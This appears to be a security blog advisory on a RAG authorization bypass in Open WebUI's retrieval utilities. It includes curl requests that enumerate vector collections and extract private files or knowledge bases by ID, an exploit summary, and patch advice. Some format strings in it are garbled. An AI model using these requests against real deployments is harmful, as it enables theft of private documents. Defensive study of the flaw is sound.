Listen to this Post
The vulnerability lies in the `get_sources_from_items` function within `backend/open_webui/retrieval/utils.py` (lines 963-965, 1063-1068, 1126-1131). Three of five code paths that resolve file and knowledge base references into vector search queries lack authorization checks. The affected paths are:
– `type: “file”` with non-full-context (default) – lines 1063-1068, no access check.
– `type: “text”` with `collection_name` – lines 963-965, no access check.
– Bare `collection_name` / `collection_names` – lines 1126-1131, no access check.
These paths pass user-supplied collection names directly to query_collection(), which queries the vector store without verifying if the user has permission. Collection names follow predictable formats: `file-{"type": "text", "collection_name": "<knowledge_base_id>"}. Access revocation via `has_access_to_file` is bypassed because the unprotected paths never call it. The CVSS 3.1 score is High (7.5) due to Network attack vector, Low complexity, Low privileges required, No user interaction, and High confidentiality impact.
Platform: Open WebUI
Version: main (6fdd19bf1)
Vulnerability: RAG authorization bypass
Severity: High
date: 2026-05-08
Prediction: 2026-06-15
What Undercode Say:
Identify vector store collections
curl -X GET "http://target/api/vector/collections" -H "Authorization: Bearer $TOKEN"
Extract file content via RAG chat completion
curl -X POST "http://target/api/chat/completions" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"model": "gpt-3.5-turbo",
"messages": [{"role": "user", "content": "Show full document content"}],
"files": [{"type": "file", "id": "target_file_id"}]
}'
Attack using knowledge base UUID
curl -X POST "http://target/api/chat/completions" \
-H "Authorization: Bearer $TOKEN" \
-d '{"model":"any","messages":[{"role":"user","content":"List all knowledge"}],"files":[{"type":"text","collection_name":"550e8400-e29b-41d4-a716-446655440000"}]}'
Check unprotected code path in source
grep -n "query_collection" backend/open_webui/retrieval/utils.py
Exploit:
Attacker needs valid account and target resource ID (file or knowledge base). Send chat completion request with `files` array containing `{“type”:”file”,”id”:”{"type":"text","collection_name":"<uuid>"}. Default non-full-context path triggers direct vector query without has_access_to_file. Returned embedding chunks are fed to LLM, which outputs stolen content. Access revocation is ineffective; once ID is known, extraction works indefinitely.
Protection from this CVE
Add authorization checks in all three unprotected code paths before calling query_collection(). For `type: “file”` non-full-context, call has_access_to_file(file_id, user_id). For `type: “text”` with collection_name and bare collection_name, validate that the user has explicit permission to that knowledge base or that the collection corresponds to a file the user can access. Implement a centralized access wrapper `authorized_query_collection(collection_name, user)` that enforces checks. Update to commit with patch once available.
Impact
- Private file and knowledge base content fully extractable by any authenticated user who obtains a resource ID.
- Access revocation (removing share permissions) does not stop RAG extraction – previously authorized users retain indefinite access.
- Complete breakdown of Open WebUI’s access control model for RAG-enabled documents.
- Confidentiality impact is High; attackers can systematically dump entire vector stores.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
